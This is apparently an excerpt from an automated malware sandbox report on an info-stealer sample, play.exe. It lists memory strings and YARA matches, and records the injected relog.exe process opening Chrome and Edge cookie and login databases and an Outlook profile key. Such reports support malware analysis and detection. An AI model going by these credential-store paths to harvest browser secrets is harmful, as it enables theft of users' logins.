Source: C:\Windows\SysWOW64\relog.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE86AF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00BE86AF

Stealing of Sensitive Information

Source: Yara match File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\relog.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\relog.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY